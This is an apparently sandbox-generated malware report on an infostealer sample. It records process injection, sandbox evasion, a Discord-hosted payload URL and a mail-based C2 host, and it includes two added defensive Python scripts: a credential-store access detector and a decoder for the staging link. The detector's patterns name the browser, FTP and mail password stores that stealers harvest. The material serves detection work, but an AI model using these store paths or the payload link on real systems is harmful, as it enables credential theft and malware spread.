Source: Yara match | File source: 0.2.450230549.exe.3820c80.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.450230549.exe.385caa0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.450230549.exe.37e4e58.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.450230549.exe.3820c80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.3558791115.00000000028D5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3557540735.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1726211238.0000000003709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 450230549.exe PID: 7068, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 4136, type: MEMORYSTR
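The file and registry accesses above are what the "Tries to harvest and steal ..." signatures key on: one process, running as a .NET Framework utility, opens the password store of five browsers, two FTP clients and three mail clients in sequence. The following is an added example written for this page (not code from the report or from the sample) that maps such accesses onto the credential stores they belong to and raises an infostealer verdict when a single process touches stores of several unrelated applications. The store table covers only the stores this report shows, and the verdict thresholds are assumptions.

```python
"""
Credential-store access triage (added example, not code from the report or the sample).
"""
import re
from collections import defaultdict

# (category, application, access kind, regex over a normalised path or registry key)
STORE_RULES = [
    ("browser", "Chrome", "file",
     r"^%localappdata%\\google\\chrome\\user data\\[^\\]+\\login data$"),
    ("browser", "Edge", "file",
     r"^%localappdata%\\microsoft\\edge\\user data\\[^\\]+\\login data$"),
    ("browser", "Firefox", "file", r"^%appdata%\\mozilla\\firefox\\profiles\.ini$"),
    ("browser", "Cyberfox", "file", r"^%appdata%\\8pecxstudios\\cyberfox\\profiles\.ini$"),
    ("browser", "BlackHawk", "file",
     r"^%appdata%\\netgate technologies\\blackhawk\\profiles\.ini$"),
    ("ftp", "WinSCP", "registry", r"^hkcu\\software\\martin prikryl\\winscp 2\\sessions$"),
    ("ftp", "FTP Navigator", "file", r"^[a-z]:\\ftp navigator\\ftplist\.txt$"),
    ("mail", "Thunderbird", "file", r"^%appdata%\\thunderbird\\profiles\.ini$"),
    ("mail", "Outlook (MAPI profiles)", "registry",
     r"^hkcu\\software\\microsoft\\windows nt\\currentversion\\windows messaging subsystem\\profiles$"),
    ("mail", "IncrediMail", "registry", r"^hkcu\\software\\incredimail\\identities$"),
]

# Constructed input: the accesses transcribed from the report lines above.
ACCESSES = [
    ("registry", r"HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"),
    ("file", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    ("file", r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"),
    ("file", r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"),
    ("file", r"C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini"),
    ("file", r"C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini"),
    ("file", r"C:\FTP Navigator\Ftplist.txt"),
    ("file", r"C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini"),
    ("file", r"C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini"),
    ("registry", r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles"),
    ("registry", r"HKEY_CURRENT_USER\Software\IncrediMail\Identities"),
]


def normalise(path):
    """Lower-case and swap user-specific prefixes for stable tokens, so one rule covers every user."""
    p = path.replace("/", "\\").lower()
    p = re.sub(r"^hkey_current_user\\", r"hkcu\\", p)
    p = re.sub(r"^[a-z]:\\users\\[^\\]+\\appdata\\local\\", r"%localappdata%\\", p)
    p = re.sub(r"^[a-z]:\\users\\[^\\]+\\appdata\\roaming\\", r"%appdata%\\", p)
    return p


def classify(accesses):
    """Return ({category: [applications]}, [unmatched accesses])."""
    stores = defaultdict(set)
    unmatched = []
    for kind, path in accesses:
        p = normalise(path)
        for category, app, rule_kind, pattern in STORE_RULES:
            if kind == rule_kind and re.search(pattern, p):
                stores[category].add(app)
                break
        else:
            unmatched.append((kind, path))
    return {c: sorted(apps) for c, apps in stores.items()}, unmatched


def verdict(stores, min_categories=2, min_stores=3):
    """A program reads its own store; touching several unrelated ones is the stealer pattern (thresholds assumed)."""
    count = sum(len(apps) for apps in stores.values())
    return {"stores": count, "categories": sorted(stores),
            "infostealer_pattern": len(stores) >= min_categories and count >= min_stores}


if __name__ == "__main__":
    found, missed = classify(ACCESSES)
    print(found, missed)
    print(verdict(found))
```

Two caveats when turning this into a production rule. The Gecko-family hits (Firefox, Cyberfox, BlackHawk, Thunderbird) are reads of profiles.ini, which only locates the profile directory; the stored logins live in files inside that directory, so the report shows the enumeration step rather than the read of the secrets themselves. And the Chromium "Login Data" file is a database whose stored passwords are protected with the user's DPAPI key, so a process reading it is normally the browser itself or a backup agent; an allow-list of those readers is what keeps the rule quiet on a clean host.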

                    Remote Access Functionality

Source: Yara match | File source: 0.2.450230549.exe.385caa0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.450230549.exe.37e4e58.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.450230549.exe.3820c80.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.450230549.exe.385caa0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.450230549.exe.37e4e58.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.450230549.exe.3820c80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.3558791115.0000000002925000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3558791115.0000000002902000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3558791115.00000000028D5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3557540735.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1726211238.0000000003709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 450230549.exe PID: 7068, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 4136, type: MEMORYSTR
MITRE ATT&CK Matrix

Techniques prefixed with digits are the ones the report matched; the digits are the report's count badges, reproduced as rendered. Techniques without a prefix are the remaining cells of the matrix grid.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 231 Windows Management Instrumentation; 1 Native API; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 DLL Side-Loading; 311 Process Injection; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Obfuscated Files or Information; 1 Software Packing; 1 Timestomp; 1 DLL Side-Loading; 11 Masquerading; 261 Virtualization/Sandbox Evasion; 311 Process Injection
Credential Access: 2 OS Credential Dumping; 21 Input Capture; 1 Credentials in Registry; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 1 File and Directory Discovery; 34 System Information Discovery; 531 Security Software Discovery; 1 Process Discovery; 261 Virtualization/Sandbox Evasion; 1 System Network Configuration Discovery; Remote System Discovery; System Owner/User Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 11 Archive Collected Data; 2 Data from Local System; 1 Email Collection; 21 Input Capture; 1 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 1 Ingress Tool Transfer; 11 Encrypted Channel; 1 Non-Standard Port; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph (ID 1519251, sample 450230549.exe, start date 26/09/2024, architecture WINDOWS, score 100)

Sample level: contacts zqamcx.com, mail.zqamcx.com and 3 other IPs or domains. Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Icon mismatch, binary includes an icon from a different legit application in order to fool users; 11 other signatures.

450230549.exe (started): contacts cdn.discordapp.com 162.159.134.233, port 443, from source port 49731 (CLOUDFLARENET, United States); drops C:\Users\user\AppData\...\450230549.exe.log (type unknown). Signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; Allocates memory in foreign processes; Injects a PE file into a foreign processes. Starts three RegAsm.exe processes.

RegAsm.exe (first child): contacts zqamcx.com 78.110.166.82, port 587, from source port 49733 (UKSERVERS-AS, United Kingdom) and ip-api.com 208.95.112.1, port 80, from source port 49732 (TUT-AS, United States). Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; 2 other signatures.

RegAsm.exe (second child): Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent).

RegAsm.exe (third child): no further annotations in the graph.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample
Source | Detection | Scanner | Label
450230549.exe | 34% | ReversingLabs | Win32.Trojan.Sonbokli
450230549.exe | 100% | Joe Sandbox ML |

Dropped Files: No Antivirus matches
Unpacked PE Files: No Antivirus matches
Domains: No Antivirus matches
URLs
Source | Detection | Scanner | Label
https://account.dyn.com/ | 0% | URL Reputation | safe
http://x1.c.lencr.org/0 | 0% | URL Reputation | safe
http://x1.i.lencr.org/0 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://ip-api.com/line/?fields=hosting | 0% | URL Reputation | safe
http://r11.o.lencr.org0# | 0% | Avira URL Cloud | safe
http://mail.zqamcx.com | 0% | Avira URL Cloud | safe
https://cdn.discordapp.com/attachments/1288648799220400244/1288752046828425256/kingggggme.txt?ex=66f | 0% | Avira URL Cloud | safe
https://cdn.discordapp.com/attachments/1288648799220400244/1288752046828425256/kingggggme.txt?ex=66f6535f&is=66f501df&hm=79c31af27b70e67c8e5bccaa49762a5ee024314b22617ea8ae2de8893a0fe97d& | 0% | Avira URL Cloud | safe
http://cdn.discordapp.com | 0% | Avira URL Cloud | safe
http://ip-api.com | 0% | Avira URL Cloud | safe
http://r11.i.lencr.org/0# | 0% | Avira URL Cloud | safe
http://zqamcx.com | 0% | Avira URL Cloud | safe
https://cdn.discordapp.com | 0% | Avira URL Cloud | safe
http://cdn.discordapp.comd | 0% | Avira URL Cloud | safe
Contacted Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
zqamcx.com | 78.110.166.82 | true | true | | unknown
cdn.discordapp.com | 162.159.134.233 | true | false | | unknown
ip-api.com | 208.95.112.1 | true | true | | unknown
198.187.3.20.in-addr.arpa | unknown | unknown | false | | unknown
mail.zqamcx.com | unknown | unknown | true | | unknown
Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
https://cdn.discordapp.com/attachments/1288648799220400244/1288752046828425256/kingggggme.txt?ex=66f6535f&is=66f501df&hm=79c31af27b70e67c8e5bccaa49762a5ee024314b22617ea8ae2de8893a0fe97d& | false | Avira URL Cloud: safe | unknown
http://ip-api.com/line/?fields=hosting | false | URL Reputation: safe | unknown
URLs from Memory and Binaries
Name | Source | Malicious | Antivirus Detection | Reputation
http://mail.zqamcx.com | RegAsm.exe, 00000003.00000002.3558791115.0000000002908000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://account.dyn.com/ | 450230549.exe, 00000000.00000002.1726211238.0000000003709000.00000004.00000800.00020000.00000000.sdmp; RegAsm.exe, 00000003.00000002.3557540735.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://r11.o.lencr.org0# | RegAsm.exe, 00000003.00000002.3558791115.0000000002908000.00000004.00000800.00020000.00000000.sdmp; RegAsm.exe, 00000003.00000002.3561320384.0000000005AF0000.00000004.00000020.00020000.00000000.sdmp; RegAsm.exe, 00000003.00000002.3558363687.0000000000D6E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://x1.c.lencr.org/0 | RegAsm.exe, 00000003.00000002.3558791115.0000000002908000.00000004.00000800.00020000.00000000.sdmp; RegAsm.exe, 00000003.00000002.3561320384.0000000005AF0000.00000004.00000020.00020000.00000000.sdmp; RegAsm.exe, 00000003.00000002.3558363687.0000000000D6E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://x1.i.lencr.org/0 | RegAsm.exe, 00000003.00000002.3558791115.0000000002908000.00000004.00000800.00020000.00000000.sdmp; RegAsm.exe, 00000003.00000002.3561320384.0000000005AF0000.00000004.00000020.00020000.00000000.sdmp; RegAsm.exe, 00000003.00000002.3558363687.0000000000D6E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://cdn.discordapp.com | 450230549.exe, 00000000.00000002.1725521175.0000000002783000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ip-api.com | RegAsm.exe, 00000003.00000002.3558791115.00000000028A1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.discordapp.com/attachments/1288648799220400244/1288752046828425256/kingggggme.txt?ex=66f | 450230549.exe | false | Avira URL Cloud: safe | unknown
http://zqamcx.com | RegAsm.exe, 00000003.00000002.3558791115.0000000002908000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.discordapp.com | 450230549.exe, 00000000.00000002.1725521175.0000000002767000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 450230549.exe, 00000000.00000002.1725521175.0000000002767000.00000004.00000800.00020000.00000000.sdmp; RegAsm.exe, 00000003.00000002.3558791115.00000000028A1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://r11.i.lencr.org/0# | RegAsm.exe, 00000003.00000002.3558791115.0000000002908000.00000004.00000800.00020000.00000000.sdmp; RegAsm.exe, 00000003.00000002.3561320384.0000000005AF0000.00000004.00000020.00020000.00000000.sdmp; RegAsm.exe, 00000003.00000002.3558363687.0000000000D6E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://cdn.discordapp.comd | 450230549.exe, 00000000.00000002.1725521175.0000000002783000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
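The staging URL on cdn.discordapp.com recorded above is not a stable indicator: the ex, is and hm query parameters make it a signed, time-limited link, and the report also holds a copy truncated at "?ex=66f". The following is an added example written for this page (not code from the report or from the sample) that decodes those parameters. My reading of the scheme, which the report does not state, is that ex and is are hexadecimal Unix timestamps for expiry and issue time, hm is an opaque signature over the link, and the numeric path components are Discord snowflakes whose upper bits carry a millisecond timestamp from a 2015-01-01 epoch; all of that is an assumption of the example. The functions answer the question an analyst has when re-running such a sample: was the payload still fetchable when the sandbox ran, and for how long after it was uploaded?

```python
"""
Decode the time-limited parameters of a Discord CDN attachment link
(added example; the scheme as described in the lead-in is an assumption).
"""
import re
from datetime import datetime, timezone
from urllib.parse import parse_qs, urlsplit

DISCORD_EPOCH_MS = 1_420_070_400_000  # 2015-01-01T00:00:00Z, snowflake epoch (assumption)
HEX_TIMESTAMP = re.compile(r"^[0-9a-f]{8}$")

# URL exactly as recorded in the report (the trailing '&' is part of the record).
STAGING_URL = ("https://cdn.discordapp.com/attachments/1288648799220400244/"
               "1288752046828425256/kingggggme.txt?ex=66f6535f&is=66f501df"
               "&hm=79c31af27b70e67c8e5bccaa49762a5ee024314b22617ea8ae2de8893a0fe97d&")

# The report's "Start date and time", 2024-09-26 09:17:58 +02:00, as Unix time.
ANALYSIS_START = int(datetime.fromisoformat("2024-09-26 09:17:58+02:00").timestamp())


def _iso(unix_seconds):
    return datetime.fromtimestamp(unix_seconds, timezone.utc).isoformat()


def snowflake_to_unix_ms(snowflake):
    """The top 42 bits of a Discord snowflake are milliseconds since DISCORD_EPOCH_MS."""
    return (snowflake >> 22) + DISCORD_EPOCH_MS


def _hex_timestamp(query, name):
    """Reject a missing or truncated value, such as the report's copy cut at '?ex=66f'."""
    value = query.get(name, [""])[0].lower()
    if not HEX_TIMESTAMP.match(value):
        raise ValueError("parameter %r missing or truncated: %r" % (name, value))
    return int(value, 16)


def decode_discord_cdn_url(url):
    parts = urlsplit(url)
    if parts.netloc.lower() != "cdn.discordapp.com":
        raise ValueError("not a cdn.discordapp.com URL")
    segs = parts.path.split("/")  # ['', 'attachments', channel_id, attachment_id, filename]
    if len(segs) != 5 or segs[1] != "attachments":
        raise ValueError("unexpected path layout: %s" % parts.path)
    query = parse_qs(parts.query)  # the empty pair left by the trailing '&' is dropped
    issued, expires = _hex_timestamp(query, "is"), _hex_timestamp(query, "ex")
    return {
        "channel_id": segs[2],
        "attachment_id": segs[3],
        "filename": segs[4],
        "uploaded_ms": snowflake_to_unix_ms(int(segs[3])),
        "issued": issued, "issued_iso": _iso(issued),
        "expires": expires, "expires_iso": _iso(expires),
        "valid_for_s": expires - issued,
        "signature": query.get("hm", [""])[0],
    }


def fetchable_at(info, unix_seconds):
    """True while the signed link is inside its validity window."""
    return info["issued"] <= unix_seconds < info["expires"]


if __name__ == "__main__":
    info = decode_discord_cdn_url(STAGING_URL)
    print(info)
    print("fetchable at analysis start:", fetchable_at(info, ANALYSIS_START))
```

For this link the decoded window is 2024-09-26 06:40:31 UTC to 2024-09-27 06:40:31 UTC, one day, and the attachment snowflake dates the upload to the same second the link was issued; the analysis started at 07:17:58 UTC, inside the window, which is why the download succeeded. A re-run after the expiry reproduces only the first stage, so the payload behind such a link should be retrieved and archived while the window is open, and the hash of what was retrieved, not the URL, is the indicator worth keeping.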
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-AS (US) | true
78.110.166.82 | zqamcx.com | United Kingdom | 42831 | UKSERVERS-AS UK Dedicated Servers Hosting and Co-Location | true
162.159.134.233 | cdn.discordapp.com | United States | 13335 | CLOUDFLARENET (US) | false
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1519251
                              Start date and time:2024-09-26 09:17:58 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 6m 24s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Run name:Run with higher sleep bypass
Number of new started processes analysed:8
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:450230549.exe
                              Detection:MAL
                              Classification:mal100.spre.troj.spyw.evad.winEXE@7/1@4/3
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 88
                              • Number of non-executed functions: 7
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
• Sleeps longer than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analysed; the report is missing behavior information
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              • VT rate limit hit for: 450230549.exe
                              No simulations
Context: IPs
Match | Associated Sample Name / URL | Detection | Threat Name | Context
208.95.112.1 | SecuriteInfo.com.Win32.Malware-gen.27656.20815.exe | malicious | Blackshades, Quasar | ip-api.com/json/
208.95.112.1 | nDHL_AWB_6078538091_scr.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | CCE_000110.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | rMT103SwiftCopyoFPayment.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | QUOTE_467654.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | COMMERCAIL INVOICE AND TNT AWB TRACKING INVOICE.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | PO Invoice XJ210821Q.PDF.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | PO Invoice XJ210821Q.PDF.scr.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | comprobante_HSBC_765543465768798086756458665345768.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | Company profile.js | malicious | PXRECVOWEIWOEI Stealer, PureLog Stealer | ip-api.com/line/?fields=hosting
78.110.166.82 | COB756883.vbs | malicious | CobaltStrike | windowsupdatesolutions.com/ServerCOB.txt
78.110.166.82 | Ingreso_SII_Abril_2021.cmd | malicious | Unknown | www.emolcl.com/namaste/puma.php
78.110.166.82 | Ingreso_SII_Abril_2021.cmd | malicious | Unknown | www.emolcl.com/namaste/puma.php
Context: Domains
Match | Associated Sample Name / URL | Detection | Threat Name | Context
cdn.discordapp.com | CSBls4grBI.exe | malicious | LummaC, Socks5Systemz | 162.159.130.233
cdn.discordapp.com | https://mj.ostep.net/acknowledgements | malicious | Unknown | 162.159.133.233
cdn.discordapp.com | Shipping Documemt.vbs | malicious | Lokibot | 162.159.135.233
cdn.discordapp.com | CERENAK-7373.exe | malicious | Unknown | 162.159.135.233
cdn.discordapp.com | CERENAK-7373.exe | malicious | Unknown | 162.159.135.233
cdn.discordapp.com | 22.09.2024-22.09.2024.exe | malicious | AgentTesla | 162.159.133.233
cdn.discordapp.com | receipt#295.vbs | malicious | Unknown | 162.159.129.233
cdn.discordapp.com | COT-14303168077.pdf.js | malicious | Unknown | 162.159.135.233
cdn.discordapp.com | https://mjj.aigc369.com/ | malicious | Unknown | 162.159.130.233
ip-api.com | SecuriteInfo.com.Win32.Malware-gen.27656.20815.exe | malicious | Blackshades, Quasar | 208.95.112.1
ip-api.com | nDHL_AWB_6078538091_scr.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | CCE_000110.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | rMT103SwiftCopyoFPayment.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | QUOTE_467654.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | COMMERCAIL INVOICE AND TNT AWB TRACKING INVOICE.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | http://getcloudapp.com | malicious | Unknown | 208.95.112.2
ip-api.com | PO Invoice XJ210821Q.PDF.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | PO Invoice XJ210821Q.PDF.scr.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | comprobante_HSBC_765543465768798086756458665345768.exe | malicious | AgentTesla | 208.95.112.1
zqamcx.com | eFatura_ETN2024000000575_Ekleri.exe | malicious | AgentTesla | 78.110.166.82
zqamcx.com | SecuriteInfo.com.Win32.MalwareX-gen.16545.12050.exe | malicious | AgentTesla | 78.110.166.82
zqamcx.com | DOC25082024.bat.exe | malicious | AgentTesla | 78.110.166.82
zqamcx.com | Halkbank_Ekstre_20240826_081429_424889.bat.exe | malicious | AgentTesla | 78.110.166.82
zqamcx.com | SecuriteInfo.com.Win32.MalwareX-gen.1615.29113.exe | malicious | AgentTesla, PureLog Stealer | 78.110.166.82
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
UKSERVERS-ASUKDedicatedServersHostingandCo-Location | CCE_000110.exe | Get hash | malicious | AgentTesla | Browse | 78.110.166.82
UKSERVERS-ASUKDedicatedServersHostingandCo-Location | https://qrplanet.com/smdv5p/ | Get hash | malicious | Unknown | Browse | 5.101.173.45
UKSERVERS-ASUKDedicatedServersHostingandCo-Location | 22.09.2024-22.09.2024.exe | Get hash | malicious | AgentTesla | Browse | 78.110.166.82
UKSERVERS-ASUKDedicatedServersHostingandCo-Location | FaturaHat#U0131rlatma.exe | Get hash | malicious | AgentTesla | Browse | 78.110.166.82
UKSERVERS-ASUKDedicatedServersHostingandCo-Location | Payment_Release-Now cnesst.gouv.qc.ca.html | Get hash | malicious | Unknown | Browse | 5.101.173.45
UKSERVERS-ASUKDedicatedServersHostingandCo-Location | Payment Advice.pdf.js | Get hash | malicious | Remcos | Browse | 178.159.12.230
UKSERVERS-ASUKDedicatedServersHostingandCo-Location | eFatura_ETN2024000000575_Ekleri.exe | Get hash | malicious | AgentTesla | Browse | 78.110.166.82
UKSERVERS-ASUKDedicatedServersHostingandCo-Location | AMERICAN GROUP.js | Get hash | malicious | Remcos | Browse | 178.159.12.230
UKSERVERS-ASUKDedicatedServersHostingandCo-Location | SecuriteInfo.com.Win32.MalwareX-gen.16545.12050.exe | Get hash | malicious | AgentTesla | Browse | 78.110.166.82
UKSERVERS-ASUKDedicatedServersHostingandCo-Location | #U00d6deme Talebi_27.08.2024.exe | Get hash | malicious | AgentTesla | Browse | 78.110.166.82
TUT-ASUS | SecuriteInfo.com.Win32.Malware-gen.27656.20815.exe | Get hash | malicious | Blackshades, Quasar | Browse | 208.95.112.1
TUT-ASUS | nDHL_AWB_6078538091_scr.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
TUT-ASUS | 0umBa15TaN.exe | Get hash | malicious | Unknown | Browse | 208.95.112.1
TUT-ASUS | 0umBa15TaN.exe | Get hash | malicious | Unknown | Browse | 208.95.112.1
TUT-ASUS | CCE_000110.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
TUT-ASUS | rMT103SwiftCopyoFPayment.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
TUT-ASUS | QUOTE_467654.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
TUT-ASUS | COMMERCAIL INVOICE AND TNT AWB TRACKING INVOICE.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
TUT-ASUS | http://getcloudapp.com | Get hash | malicious | Unknown | Browse | 208.95.112.2
TUT-ASUS | PO Invoice XJ210821Q.PDF.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
CLOUDFLARENETUS | 64.exe | Get hash | malicious | Unknown | Browse | 162.159.61.3
CLOUDFLARENETUS | PO-100001499.exe | Get hash | malicious | FormBook | Browse | 188.114.96.3
CLOUDFLARENETUS | ADNOC requesting RFQ.exe | Get hash | malicious | FormBook | Browse | 104.21.64.108
CLOUDFLARENETUS | TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe | Get hash | malicious | MassLogger RAT, Snake Keylogger, VIP Keylogger | Browse | 188.114.96.3
CLOUDFLARENETUS | https://qwehikd-asdu.xyz/ | Get hash | malicious | Unknown | Browse | 188.114.96.3
CLOUDFLARENETUS | https://geminishdw-dws.top/ | Get hash | malicious | Unknown | Browse | 188.114.97.3
CLOUDFLARENETUS | https://geminiqwc-sw.top/ | Get hash | malicious | Unknown | Browse | 188.114.96.3
CLOUDFLARENETUS | https://qwekorqw-eqo.top/ | Get hash | malicious | Unknown | Browse | 188.114.96.3
CLOUDFLARENETUS | https://geminiup-uuyc.top/ | Get hash | malicious | Unknown | Browse | 188.114.96.3
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
3b5074b1b5d032e5620f69f9f700ff0e | TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe | Get hash | malicious | MassLogger RAT, Snake Keylogger, VIP Keylogger | Browse | 162.159.134.233
3b5074b1b5d032e5620f69f9f700ff0e | https://geminiqwc-sw.top/ | Get hash | malicious | Unknown | Browse | 162.159.134.233
